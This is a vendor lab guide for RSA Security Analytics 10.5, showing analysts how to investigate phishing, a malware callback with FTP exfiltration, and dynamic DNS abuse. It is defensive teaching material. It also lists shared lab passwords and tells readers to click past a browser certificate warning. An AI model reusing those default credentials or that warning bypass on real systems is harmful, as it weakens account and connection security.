Sunteți pe pagina 1din 148

RSA SECURITY ANALYTICS 10.5 DEMO V11.

RSA, The Security Division of EMC - For Approved RSA Use Only

RSA Security Analytics 10.5 - Demo v11.1

Table of Contents
Introduction........................................................................................................................ 3
Business Challenge ....................................................................................................................... 4
Solution .......................................................................................................................................... 5

Key Components ............................................................................................................... 6


Security Analytics v10.5 ................................................................................................................. 7

Lab Overview .................................................................................................................... 8


Lab Environment ............................................................................................................................ 9
Lab Credentials ............................................................................................................................ 10
Lab Scenario ................................................................................................................................ 11
Labs ............................................................................................................................................. 12

RSA Security Analytics 10.5 Labs ................................................................................... 13


Lab 1 - Security Analytics Overview - Phishing Use Case.......................................................... 14
Lab 2 - Intelligence and Business Context - How to know what to look for.................................. 42
Lab 3 - Dynamic DNS and Data Exfiltration ................................................................................. 67
Lab 4 - WebShell Attacks - How to Detect and Respond............................................................. 90
Lab 5 - Malicious Insider - How to Detect and Respond ............................................................ 116

Troubleshooting............................................................................................................. 143
General Troubleshooting and Tips ............................................................................................. 144
RSA Security Analytics Troubleshooting & Tips......................................................................... 145

Conclusion..................................................................................................................... 147
Conclusion ................................................................................................................................. 148

RSA Security Analytics 10.5 - Demo v11.1

Introduction

RSA Security Analytics 10.5 - Demo v11.1

Page 3

RSA Security Analytics 10.5 - Demo v11.1

Business Challenge
Today's security threats are multi-faceted, dynamic and stealthy. Staying in front of attackers has never
been more difficult. Attackers are spending significant resources to learn about an organization in order
to develop malware to specifically target that organization. Relying on signature-based tools has
become an ineffective method against these threats as they have never been seen before.
Organizations need the tools to help them quickly detect compromises, use of non-standard
communication tools, and exfiltration or sabotage of critical data as well as manage the workflow of
detection to remediation. These tools will enable them to confirm infections and take action.

RSA Security Analytics 10.5 - Demo v11.1

Page 4

RSA Security Analytics 10.5 - Demo v11.1

Solution
Security Analytics will address the requirement for tools to enable quick detection of compromises, use
of non-standard communication tools, and exfiltration or sabotage of critical data.
This solution provides the following:
With RSA Security Analytics, organizations can:
Augment the existing SIEM capabilities with better visibility, analysis and workflow
Inspect every packet session for threat indicators at time of collection with capture time
enrichment
Instantly pivot from incidents into network packet detail to perform network forensics and
understand the true nature and scope of issues

RSA Security Analytics 10.5 - Demo v11.1

Page 5

RSA Security Analytics 10.5 - Demo v11.1

Key Components

RSA Security Analytics 10.5 - Demo v11.1

Page 6

RSA Security Analytics 10.5 - Demo v11.1

Security Analytics v10.5


As organizations' IT Security departments have evolved over the years to combat malicious or
unauthorized access of their information assets, they have relied on an information security model
based on multiple layers of defense. Various technologies such as firewalls, intrusion prevention, antivirus, zero day protection mechanisms, data loss prevention, and strong authentication have been
introduced. The goal of this model is to add enough friction in the environment to eliminate or at least
drastically slow down an intrusion attempt.
The good news is that organizations are blocking more attacks than ever before as all of these layers
are effective at preventing and blocking known attack vectors. The bad news is that despite this
investment, reported breaches have continued to increase year over year. These successful attacks
bypass each layer of prevention that has been put in place because they often use valid user
credentials, trusted access paths, or new exploits, thus going unnoticed by preventative controls.
As a result, organizations want to get more visibility into the effectiveness of these layers. More than ten
years ago, the security information and event management system (or SIEM) was added to the IT
Security repertoire. The purpose of SIEM is to collect log data from the different security tools within an
organization and perform event correlation against this data. The SIEM gives security personnel
visibility of what is going on across the entire enterprise by connecting the dots between anomalies
within the different layers of defense. Organizations have no choice but to allow some traffic to pass
through all layers of defense in order to do business, traffic will need to flow through preventative
controls. Logs only tell part of the story of what traffic makes it through. They only report on what the
preventative controls have identified. Organizations need a way to look at the traffic that the
preventative controls miss.
As organizations have added more preventative controls, the amount of data and events generated
have started to overwhelm the security team. The security team needs a way to get more work done in
a shorter time. They also need away to make highly skilled security personnel more efficient and the
less skilled security personnel more effective.

RSA Security Analytics 10.5 - Demo v11.1

Page 7

RSA Security Analytics 10.5 - Demo v11.1

Lab Overview

RSA Security Analytics 10.5 - Demo v11.1

Page 8

RSA Security Analytics 10.5 - Demo v11.1

Lab Environment
The environment for this lab includes the following:
1 Windows 2012 Launch Pad
1 Windows 2012 Domain Controller
1 Security Analytics Hybrid Server
1 Security Analytics Event Stream Analyzer

RSA Security Analytics 10.5 - Demo v11.1

Page 9

RSA Security Analytics 10.5 - Demo v11.1

Lab Credentials
LaunchPad
vlab\Administrator / Password123!
All other machines are available through the mRemoteNG available on the LaunchPad desktop.
Credentials for Windows machines (Domain Controller) are: Administrator / Password123!
Credentials for appliances (saesarchvr, sahybrid) are: root / netwitness
Security Analytics UI
admin / Password123! - Administrator
alex / Password123! - Limited Access
amy / Password123! - Data Privacy Officer
sam / Password123! - Level One Analyst
chris / Password123! - Level Two Analyst

RSA Security Analytics 10.5 - Demo v11.1

Page 10

RSA Security Analytics 10.5 - Demo v11.1

Lab Scenario
Chris is a level two security analyst. He monitors the incident queue for alerts that may indicate
compromise of systems. He wants to improve the visibility into the systems as well as the efficiency of
the analysts. His manager, Jim, wants to standardize the work flow as well as gain visibility into it.

RSA Security Analytics 10.5 - Demo v11.1

Page 11

RSA Security Analytics 10.5 - Demo v11.1

Labs
This lab includes the following labs:
Security Analytics Overview
Security Analytics Intelligence and Business Context - How to know what to look for
Dynamic DNS and Data Exfiltration
WebShell Attacks - How to Detect and Respond

RSA Security Analytics 10.5 - Demo v11.1

Page 12

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics 10.5 Labs

RSA Security Analytics 10.5 - Demo v11.1

Page 13

RSA Security Analytics 10.5 - Demo v11.1

Lab 1 - Security Analytics Overview - Phishing Use Case


This lab provides an overview of Security Analytics functionality.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To ingest data, first double-click on the mRemoteNG icon on the desktop.

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

RSA Security Analytics 10.5 - Demo v11.1

Page 14

RSA Security Analytics 10.5 - Demo v11.1

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

2.3 Copy the command from the Desktop file


Highlight the command line under ASOC Demo and choose Copy or Ctrl+C

RSA Security Analytics 10.5 - Demo v11.1

Page 15

RSA Security Analytics 10.5 - Demo v11.1

2.4 Paste the command in the Console


Paste the command into the console and press enter. The command will begin to run.

2.5 Wait for the command to complete.


It may take 8 to 10 minutes to complete.

Step 3 Connect to the Security Analytics User Interface


Click on the the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If is does not, choose the RSA Security Analytics
bookmark from the toolbar.

RSA Security Analytics 10.5 - Demo v11.1

Page 16

RSA Security Analytics 10.5 - Demo v11.1

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.

RSA Security Analytics 10.5 - Demo v11.1

Page 17

RSA Security Analytics 10.5 - Demo v11.1

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

RSA Security Analytics 10.5 - Demo v11.1

Page 18

RSA Security Analytics 10.5 - Demo v11.1

3.3 Enter the user credentials


Username = admin
Password = Password123!

RSA Security Analytics 10.5 - Demo v11.1

Page 19

RSA Security Analytics 10.5 - Demo v11.1

Step 4 Dashboard
An analyst may start the work day by logging in and viewing the dashboard. An analyst may have more
than one dashboard defined.
1. Click Default Dashboard
2. Click Demo

RSA Security Analytics 10.5 - Demo v11.1

Page 20

RSA Security Analytics 10.5 - Demo v11.1

4.1 Demo Dashboard


** Note: Due to the restrictions of the demonstration environment, it may take up to 5 minutes after data
capture is complete for the charts to be populated.
Note the Recent Alerts in the upper-left hand corner of the dashboard.
One of them looks like a malware callback and another one looks like a phishing attempt.
For this use case, start with the phishing attempt.

RSA Security Analytics 10.5 - Demo v11.1

Page 21

RSA Security Analytics 10.5 - Demo v11.1

4.1 Click On Phishing Attempt


1. Click on the phishing_attempt column
2. Click Investigate

Step 5 Investigation Window


The investigation window is also available from the dashboard or from an alert received via
email, SMS, or other mechanisms that provide a link.
The investigation window provides the mechanism to drill down into information received
through alerts and dashboards
It is also possible start in the investigation window and perform hunting operations to identify
malicious activity or even troubleshoot network configuration problems.
This exercise started with an alert for a detected phishing attempt. When that specific alert is
clicked, the investigation window is displayed and it is only showing data thats relevant to that
alert.

RSA Security Analytics 10.5 - Demo v11.1

Page 22

RSA Security Analytics 10.5 - Demo v11.1

When talking about a full packet capture technology such as RSA Security Analytics, there may
be hundreds and hundreds of terabytes of data in a system. Querying that amount of data can
be very cumbersome, but because of the use of meta data that RSA Security Analytics employs,
it is very quick.

Step 6 Breadcrumb
The section at the top is the query for the sessions that has been run against the RSA Security
Analytics meta data. This is called the breadcrumb. The breadcrumb shows the current subset
of data that the analyst is working with.

RSA Security Analytics 10.5 - Demo v11.1

Page 23

RSA Security Analytics 10.5 - Demo v11.1

In this case you are looking at the data that is relevant to that phishing attempt alert that was
clicked.
It is possible to query on the alert itself as shown below.

RSA Security Analytics 10.5 - Demo v11.1

Page 24

RSA Security Analytics 10.5 - Demo v11.1

Step 7 Meta Data Descriptors


Some more information about the meta data:
1. Any text in black represents the meta data category
2. The blue text is a value for that category
3. The green text is a session count for this value for this particular category
4. Looking at this phishing attempt, it is clear that it was against several different systems of
different types of Criticality
5. It was alerted as phishing because the Risk:Warning category indicates that there was a link
that was not going to the website that was displayed.
6. A single IP address was the source
7. It sent to seven distinct IP Addresses

RSA Security Analytics 10.5 - Demo v11.1

Page 25

RSA Security Analytics 10.5 - Demo v11.1

Step 8 Removing the Drill from the Investigation Window


Before drilling little deeper into this phishing attempt, look at what the investigator window looks like if
the drill down query is removed for the phishing attempt. All data for the system is shown.
1. Click the drop arrow on the bread crumb and then choose Remove
By clicking on one of the links it is just like clicking the alert from the incident or a dashboard. It will drill
down to that specific spot within the investigation window and remove all of the other data so that the
view only shows data relevant to the phishing attempt.
2. To drill into the identified phishing alerts, click on the green number next to the phishing_attempt
alert to see only the sessions that occurred that caused the phishing attempt alerts to fire.

Step 9 Manage Column Groups View


If Activity Timeline is displayed, continue with Step 10. Otherwise, the layout of Events must be
changed.

9.1 Manage Column Groups View


1. To change the layout of Events, choose Detail View

RSA Security Analytics 10.5 - Demo v11.1

Page 26

RSA Security Analytics 10.5 - Demo v11.1

2. Choose Custom Column Groups


3. Choose Activity Timeline

Step 10 Examining Events


1. The Event Type that this particular alert was fired based on network packet data
2. The Facility shows where the alert occurred
3. The Asset Criticality shows the business criticality of the asset to help to analysts prioritize
incidents.
4. Double-click on the first event to see more detail about the raw data.

Step 11 Raw Data


Up until this point, the investigation has only used meta data. Double-clicking on a session is when RSA
Security Analytics will look into the raw data and reconstruct the session for a human readable view.

RSA Security Analytics 10.5 - Demo v11.1

Page 27

RSA Security Analytics 10.5 - Demo v11.1

Double-clicking recreates the session that triggered the alert. In this case, it shows the phishing attempt
was in the form of an email.
It looks like an email from Facebook, the gist of which was that changes were made and asking the user
to login and update his or her account.
1. Click on the www.facebook.com link in the email.

Step 12 Click link to see redirection


RSA Security Analytics displays a warning that the link wasnt going to go to Facebook. It was actually
going to the displayed IP address instead. Hence, this is the reason for the phishing attempt alert.

RSA Security Analytics 10.5 - Demo v11.1

Page 28

RSA Security Analytics 10.5 - Demo v11.1

The next thing the analyst needs to do is find out who clicked on it. There were several emails that went
out to people in the organization. It is important to understand who actually clicked the link to identify the
damage that has occurred.

Step 13 Copy the IP Address


Copying the IP address of the destination will allow the analyst to drill in and query against the data to
see all of the data where the destination address equals the IP address that was in the email.
1. Copy the IP address by highlighting and pressing Ctrl+C
2. Click OK
3. Click the X to close the Link Address dialog box
4. Click the X to close the Event Reconstruction dialog box

RSA Security Analytics 10.5 - Demo v11.1

Page 29

RSA Security Analytics 10.5 - Demo v11.1

Step 14 Navigate and Query


1. Click Navigate
2. Click Query
3. Paste the IP address in the value box
4. Choose Destination IP address (ip.dst) from the Select Meta drop-down
5. Choose = from the operator drop-down

RSA Security Analytics 10.5 - Demo v11.1

Page 30

RSA Security Analytics 10.5 - Demo v11.1

14.1 Apply
1. Click Apply

RSA Security Analytics 10.5 - Demo v11.1

Page 31

RSA Security Analytics 10.5 - Demo v11.1

Step 15 Query Results


1. It is easy to see that out of the people that received the e-mail, a few of them actually clicked it.
2. When they clicked, they were taken to this destination address
3. A suspicious executable was downloaded.

Step 16 More about the Query Results


Scroll down to the Destination Country category to see that the destination country is Belarus.

RSA Security Analytics 10.5 - Demo v11.1

Page 32

RSA Security Analytics 10.5 - Demo v11.1

Step 17 Looking at the file


1. Scroll down to the Filename category.
2. Right-click on the filename sair.exe in blue, sair.exe and choose Scan for Malware.
Because there are full packets still in the system, it is possible to right-click on the executable and tell
the system to scan it for malware.

Step 18 Scan for Malware


There four different scans that can be performed on the executable file. Two of them are local to the
RSA Security Analytics System, two of them are remote. The two that are local will look at how the file
is constructed to see if there any anomalies in the way it was constructed. The other will look at how the
file came into your network to see if theres anything suspicious in the method that it came into your
network. Two that are remote will be sent to a cloud based sandbox to watch file behavior and report
on it. It will also send it to Virus Total where it will compare it against signatures of many anti-virus
organizations.
1. Choose Malware Analysis from the drop-down list
2. Click Scan
The combination of those four scans will give a very good idea about whether this file was malicious.

RSA Security Analytics 10.5 - Demo v11.1

Page 33

RSA Security Analytics 10.5 - Demo v11.1

With the knowledge that was learned from that 2 minute investigation, the analyst can send the
details off to the email filtering provider to identify how the mail filtering solution missed this
email, and the IT department can remove the malware that was launched from the 3 infected
machines. This visibility will allow closure of the hole in the existing security layers and clean up
the damage before the incident could spread too far.

Step 19 Add the Incidents to an Event


We can add these events to an incident for further study.
1. Click on the green number next to the Destination IP Address

RSA Security Analytics 10.5 - Demo v11.1

Page 34

RSA Security Analytics 10.5 - Demo v11.1

19.1 Select Events


1. Select all events
2. Click Incidents->Create New Incident

RSA Security Analytics 10.5 - Demo v11.1

Page 35

RSA Security Analytics 10.5 - Demo v11.1

19.2 Update Information


Alert Summary, Severity and Priority are already filled out based on the events. They may be modified.
Fill out the additional information for the incident such as:
1. Incident Name - unique name for this incident
2. Summary - summarize the events that occurred
3. Assignee
4. Categories - categorize this incident by choosing one or more categories from the drop-down
list
5. Click Save
Without RSA Security Analytics, a company would need to collect logs from mail servers and analyze
network traffic to identify the root cause. In addition, the malware may have been active longer on the
target systems leaving the company exposed to potential outsiders for an extended period of time.

RSA Security Analytics 10.5 - Demo v11.1

Page 36

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics 10.5 - Demo v11.1

Page 37

RSA Security Analytics 10.5 - Demo v11.1

Step 20 Optional - Daily Update Report


1. Click on the drop down menu and choose Reports.

20.1 View the Report Schedules


1. Click the Manage tab
2. Click Reports
3. Click View All Schedules

RSA Security Analytics 10.5 - Demo v11.1

Page 38

RSA Security Analytics 10.5 - Demo v11.1

20.2 Run the Report


1. Click the Actions menu
2. Click Start
3. When the state is Completed, click View

RSA Security Analytics 10.5 - Demo v11.1

Page 39

RSA Security Analytics 10.5 - Demo v11.1

20.3 Investigating from the Report


1. Click on the phishing_attempt column to display the investigate link
2. Click on Investigate. The investigation window is displayed just as it was from the Incident or
Dashboard. If the The following meta keys have no values... message is displayed, see the
Troubleshooting tips.
3. Note that the report logo may be changed as desired
Close all browser tabs when finished.

RSA Security Analytics 10.5 - Demo v11.1

Page 40

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics 10.5 - Demo v11.1

Page 41

RSA Security Analytics 10.5 - Demo v11.1

Lab 2 - Intelligence and Business Context - How to know what to


look for
In addition to full visibility, every RSA Security Analytics deployment comes with real-world threat
intelligence. RSA Live is the threat intelligence feed that is layered on top of the full visibility that RSA
Security Analytics provides. This intelligence allows the system to pick out small anomalies, or
indicators of compromise, within otherwise legitimate looking data. The more indicators of compromise
a session has, the more likely its malicious.
In addition to many commercially available threat intelligence feeds, RSA provides feeds from the First
Watch and Incident Response teams. When a company has a security breach, an incident response
team is dispatched. This team installs RSA Security Analytics along with a few other tools on the
network and eradicates the breach.
The lessons learned during that engagement are fed back to the RSA Live team and turned into threat
intelligence feeds. These feeds provide RSA Security Analytics deployments with valuable information
about the methods used by currently active threat actors. Organizations will get the benefit of learning
about the latest attacker techniques and applying that knowledge to their data. Incident response data is
just one example of how that threat intelligence is created. There are also third-party intelligence feeds
which can be ingested by the RSA Security Analytics platform.
Business context is yet another data point that can be fed into RSA Security Analytics. The ability to
label assets with meta data unique to an organization's business is critical for proper incident
prioritization. An alert that showsan attack against a random IP address is good information, but the
ability to identify that IP address as a credit card processing server in real time as the traffic comes into
the system is that much better. When an analyst can quickly identify an attack against a critical asset,
he can minimize the damage against that asset.
The combination of full visibility, fresh threat intelligence, and business context allows the security
analyst to quickly answer the questions that matter.
Who is affected?
How did they get infected?
And what is the impact to my business?
In this use case, security intelligence and business context allowed the identification of command and
control traffic from an executive laptop. Without RSA Security Analytics, this could be one of hundreds
of alerts that the layers of controls identify. With RSA Security Analytics, of the type of alert is known as
well as criticality of the asset that appears to be compromised.

RSA Security Analytics 10.5 - Demo v11.1

Page 42

RSA Security Analytics 10.5 - Demo v11.1

When this happens, it is critical to understand:


Is it a false positive?
How did it occur?
What is the impact to the business?
What is the appropriate response?

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


If data was ingested during Lab 1 - Security Analytics Overview - Phishing Use Case, go to step 3.
To ingest fresh data, first double-click on the mRemoteNG icon on the desktop.

RSA Security Analytics 10.5 - Demo v11.1

Page 43

RSA Security Analytics 10.5 - Demo v11.1

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

RSA Security Analytics 10.5 - Demo v11.1

Page 44

RSA Security Analytics 10.5 - Demo v11.1

2.3 Copy the command from the Desktop file


Highlight the command line under ASOC Demo and choose Copy or Ctrl+C

2.4 Paste the command in the Console


Paste the command into the console and press enter. The command will begin to run.

RSA Security Analytics 10.5 - Demo v11.1

Page 45

RSA Security Analytics 10.5 - Demo v11.1

2.5 Wait for the command to complete.


It may take 8 to 10 minutes to complete.

Step 3 Connect to the Security Analytics User Interface


Click on the the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If is does not, choose the RSA Security Analytics
bookmark from the toolbar.

RSA Security Analytics 10.5 - Demo v11.1

Page 46

RSA Security Analytics 10.5 - Demo v11.1

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.

RSA Security Analytics 10.5 - Demo v11.1

Page 47

RSA Security Analytics 10.5 - Demo v11.1

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

RSA Security Analytics 10.5 - Demo v11.1

Page 48

RSA Security Analytics 10.5 - Demo v11.1

3.3 Enter the user credentials


Username = admin
Password = Password123!

RSA Security Analytics 10.5 - Demo v11.1

Page 49

RSA Security Analytics 10.5 - Demo v11.1

Step 4 Incident Management


1. Click Dashboard
2. Choose Incidents
3. Choose Queue

RSA Security Analytics 10.5 - Demo v11.1

Page 50

RSA Security Analytics 10.5 - Demo v11.1

Step 5 My Incidents
RSA Security Analytics offers organizations a unified platform for incident detection, investigations,
compliance reporting and, advanced security analysis. This allows the organization's highly skilled
security personnel to be more efficient and less skilled security personnel to be more effective.
Instead of starting at the dashboard, an analyst may start his or her day by going to the incident
management queue. This is a built in incident management capability within Security Analytics. The
idea is that this has been operationalized so that when alerts come in of a certain priority, they can
create an incident of a certain priority so that the analyst knows what to work on first
We can see incidents that have been created manually as well those generated automatically and have
been assigned to the users queue.

RSA Security Analytics 10.5 - Demo v11.1

Page 51

RSA Security Analytics 10.5 - Demo v11.1

Step 6 Filter the Critical Incidents


The incidents can be sorted and filtered. To address the critical assets first, the analyst might click the
Critical check box to filter out all others.
1. Click Critical under Priority
2. Click Assigned under Status to see only those have been assigned

6.1 Choose the Assigned Incident


1. Double-click the incident named Malware Callback Followed by Data Exfiltration with the
status of Assigned.

RSA Security Analytics 10.5 - Demo v11.1

Page 52

RSA Security Analytics 10.5 - Demo v11.1

Step 7 Understanding the Incident


1. Clicking on the incident shows an overall Summary of this particular incident
2. Priority helps the analyst to understand the context of this incident.
3. Categorization and Status and other information to help understand the context of this incident.
4. The Alerts pane shows the alerts that caused the creation of this incident. In this case, it is
alerts from Event Stream Analysis component. The incident is a container or a superset of one
or more alerts.
5. Other important features are the Incident Journal and Remediation Tasks panes. Journaling is
important so that the team can understand what has been done, can make determination on
what needs to be done next as well as what remediation tasks may be needed.
6. Click on the gear next to the falert to see what has been happening on this host. There are three
choices: Investigate the Event, Investigate Source IP address, which in this case is the
potential victim, or Investigate Destination IP address.
7. Click on Investigate Source IP Address to investigate everything around this alert and this IP
address

RSA Security Analytics 10.5 - Demo v11.1

Page 53

RSA Security Analytics 10.5 - Demo v11.1

RSA Security Analytics 10.5 - Demo v11.1

Page 54

RSA Security Analytics 10.5 - Demo v11.1

Step 8 Investigate the Source IP Address


Note that just like the drill in from the dashboard in the first use case, this goes to the Investigation
view where a filtered view of the data that is only applicable to that IP address is shown
1. The breadcrumb shows this filter. By refocusing the investigation on just the IP address that is
infected, it is possible to dig in and we can look at the different sessions associated with this
particular source IP address.
2. By drilling into these sessions, it is possible to get a full picture of everything that occurred
before and after the infection. Click on the green number next to Source IP Address.

Step 9 Manage Column Groups View


If Activity Timeline is displayed, continue with Step 10. Otherwise, the layout of Events must be
changed.

RSA Security Analytics 10.5 - Demo v11.1

Page 55

RSA Security Analytics 10.5 - Demo v11.1

9.1 Manage Column Groups View


1. To change the layout of Events, choose Detail View
2. Choose Custom Column Groups
3. Choose Activity Timeline

RSA Security Analytics 10.5 - Demo v11.1

Page 56

RSA Security Analytics 10.5 - Demo v11.1

Step 10 Understanding the Infection


1. Note that there is a combination of log and packet data. Everything on this page is associated
with just the one IP address that was identified calling back out to a command-and-control
server. This is across both log and packet data.
2. This is out of the San Francisco facility, and the criticality is High because its one of the
executive PCs.
3. The events are listed in chronological order from top to bottom. It can be read like a book. The
analyst can go through in the order of what this IP address did.
4. Here is where the actual alert was fired. This is where the malware protection system sent an
alert that said there was a call back.
How did the system get infected to begin with? The best way to find out is to start reading that book.

RSA Security Analytics 10.5 - Demo v11.1

Page 57

RSA Security Analytics 10.5 - Demo v11.1

Step 11 From the beginning...


1. A user named mburns came in and logged in in the morning
2. He checked out his Instagram account and he also checked out the Bing map service.
3. He went to LinkedIn but LinkedIn looks strange because there are three different connections to
LinkedIn and this particular one looks like its associated with a suspicious file.
4. The suspicious file name is LinkedInWhosViewedMePDF.exe.
5. It has also been tagged by the NetWitness threat source.

Step 12 How the infection took place


The analyst wants to understand a little more about the traffic surrounding the download of this file.

RSA Security Analytics 10.5 - Demo v11.1

Page 58

RSA Security Analytics 10.5 - Demo v11.1

12.1 Open the previous event


Double-click on the event prior to the one containing the filename.

12.2 Change to Text View


Changing the view to text view will allow the analyst to see the HTTP back-and-forth communication.
From this, the analyst will be able to understand that the executive did click on a link that downloaded
an EXE file.
1. Click on Best Reconstruction
2. Click View Text

RSA Security Analytics 10.5 - Demo v11.1

Page 59

RSA Security Analytics 10.5 - Demo v11.1

12.3 Why did the executive click on the suspicious link?


Why would an executive do that? Surely he knew better than to click on the link that was suspicious.
But if the analyst looks a little bit deeper he can see that the executive didnt actually click on a link to
LinkedIn.com, he clicked on one to LinkedIn.cm.
1. The analyst has gained a little understanding. It looks like what happened is that the executive
tried to go to LinkedIn, misspelled the URL, and probably landed on a page that was a domain
parked by a bad actor. That bad actor probably had a perfect replica of the link to the website
and whenever the executive clicked on the Whos viewed me link, the malware was
downloaded, and this is where the main infection happened.
2. Close the window by clicking the X in the upper right-hand corner.

RSA Security Analytics 10.5 - Demo v11.1

Page 60

RSA Security Analytics 10.5 - Demo v11.1

12.4 Verifying with Events


This information shows us where our infection took place. If we close this and look a little bit further, we
can see that sure enough, that is exactly what happened. We can see that before the file was
downloaded:
1. He went to LinkenIn.cm
2. He clicked the link for Who's Viewed Me
3. He was then redirected to the actual LinkedIn.com.
He probably never knew he was infected and never knew what hit him. That answers the question of
How did the infection take place? , the next question is What is the business impact?"

RSA Security Analytics 10.5 - Demo v11.1

Page 61

RSA Security Analytics 10.5 - Demo v11.1

Step 13 What is the business impact?


To answer that question, the analyst needs to go forward in time from the alert. He knows the infection
took place here. He knows the callback took place here. What happened after the original call back?
1. There are a few HTTP sessions here that are about a minute apart. This is an indicator of
beaconing activity.
2. There is also a suspicious looking FTP session thats been flagged as a malicious host by our
threat intelligence. Double-click on this session.

RSA Security Analytics 10.5 - Demo v11.1

Page 62

RSA Security Analytics 10.5 - Demo v11.1

13.1 Examine the FTP event


The reconstructed FTP session shows the back-and-forth information that traveled between the infected
system and the external FTP server.
1. The username and password that was used is shown.
2. There were many files put to the FTP server. It looks like many PDF documents and Excel
spreadsheets
3. Since the full packets are available, it is possible to lextract the files and examine them to
determine the impact to the business. Click on Extract Files.
From a single user interface, and in only a minute or two, the analyst was able to determine who was
infected, how they became infected, and what damage was done to the business. With this information,
the organizations can close the holes in their security layers and alert the business on the details of
what information was exfiltrated.

RSA Security Analytics 10.5 - Demo v11.1

Page 63

RSA Security Analytics 10.5 - Demo v11.1

13.2 File name for extraction


1. Choose a File Name
2. Click OK

RSA Security Analytics 10.5 - Demo v11.1

Page 64

RSA Security Analytics 10.5 - Demo v11.1

13.3 File Extraction


1. Choose the file types to extract
2. Click Export and choose the export file type

RSA Security Analytics 10.5 - Demo v11.1

Page 65

RSA Security Analytics 10.5 - Demo v11.1

13.4 Scheduled Job


1. Click OK
2. Click X on the Event Reconstruction page to close the window

Step 14 Summary
From a single user interface, and in only a minute or two, the analyst was able to determine who was
infected, how they became infected, and what damage was done to the business. With this information,
the organizations can close the holes in their security layers and alert the business on the details of
what information was exfiltrated.

RSA Security Analytics 10.5 - Demo v11.1

Page 66

RSA Security Analytics 10.5 - Demo v11.1

Lab 3 - Dynamic DNS and Data Exfiltration


What is Data Exfiltration?
One of the most common goals of malicious actors is to steal data. Data exfiltration refers to the
successful sending of information out of an environment to an environment controlled by an attacker.
Data exfiltration takes many different forms and is an objective of many different types of specific
attacks.

What is Dynamic DNS?


Dynamic DNS is fundamentally a method of automatically updating name servers in public DNS
(Domain Name System) in near real-time. It is used to keep a specific domain name linked to a
changing IP address when a static IP address is not available or not desired. Dynamic DNS domains
are typically hosted by providers for that specific purpose, where the provider owns the top level domain
(tld) and a subscriber can quickly (and usually freely) register sub-domains and point them to any IP
address they choose. Examples of common dynamic DNS domains/providers include:
no-ip.com
dyndns.org
changeip.com
duiadns.net
dynamicdns.org
.. many others
When a subscriber registers a subdomain, they are free to pick any name they want and map it to any
IP address they want. For example, one could register myuniquedomainname.no-ip.org or
asnl2349qpwdan.no-ip.org and have both resolve to 5.6.7.8.

RSA Security Analytics 10.5 - Demo v11.1

Page 67

RSA Security Analytics 10.5 - Demo v11.1

A Typical Attack Scenario


For nefarious purposes, dynamic DNS allows an attacker to change the actual host and IP address
used as a drop zone, for malvertizing, or as a command and control point without having to modify the
behavior of the malware used on the victims endpoint. This provides a quick and convenient
mechanism for attackers to evade detection using traditional IP/domain reputation services. While
dynamic DNS can be used for many stages of an attack, this scenario focuses on its use as a drop
zone for data exfiltration, uncovered by noticing an anomaly in a daily report.

RSA Security Analytics 10.5 - Demo v11.1

Page 68

RSA Security Analytics 10.5 - Demo v11.1

Detection and Response


Detection of traffic or logs containing access to and from dynamic DNS domains can be done by
traditional tools such as IDS/IPS, Firewalls, and SIEM, however depending on the nature of the attack
none of those tools can provide full visibility into the associated network traffic, particularly in the case of
data exfiltration.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.

RSA Security Analytics 10.5 - Demo v11.1

Page 69

RSA Security Analytics 10.5 - Demo v11.1

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

RSA Security Analytics 10.5 - Demo v11.1

Page 70

RSA Security Analytics 10.5 - Demo v11.1

2.3 Copy the command from the Desktop file


Highlight the command line under Dyn DNS Demo and choose Copy or Ctrl+C

2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete

RSA Security Analytics 10.5 - Demo v11.1

Page 71

RSA Security Analytics 10.5 - Demo v11.1

Step 3 Connect to the Security Analytics User Interface


Click on the the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If is does not, choose the RSA Security Analytics
bookmark from the toolbar.

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.

RSA Security Analytics 10.5 - Demo v11.1

Page 72

RSA Security Analytics 10.5 - Demo v11.1

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

RSA Security Analytics 10.5 - Demo v11.1

Page 73

RSA Security Analytics 10.5 - Demo v11.1

3.3 Enter the user credentials


Username = admin
Password = Password123!

RSA Security Analytics 10.5 - Demo v11.1

Page 74

RSA Security Analytics 10.5 - Demo v11.1

Step 4 Reports
Key solution: RSA Security Analytics for Packets and Logs
Security Analytics allows for the reporting of all network, log, and net flow and endpoint data from a
single interface. By leveraging a feed of known dynamic DNS top level domains, Security Analytics can
produce a rich report summarizing all activity that has been seen both on the wire (packets) or from
various devices in the network such as proxies and firewalls (logs). In addition to just tagging traffic to
and from dynamic DNS domains, Security Analytics can add valuable business and asset context to
help an analyst sift through the noise. In this sample report, the analyst can see the dynamic DNS traffic
split by asset criticality and function.

RSA Security Analytics 10.5 - Demo v11.1

Page 75

RSA Security Analytics 10.5 - Demo v11.1

4.1 Reports
Choose Reports to examine a report based on the most recently captured data.

4.2 View All Schedules


1. Choose Reports
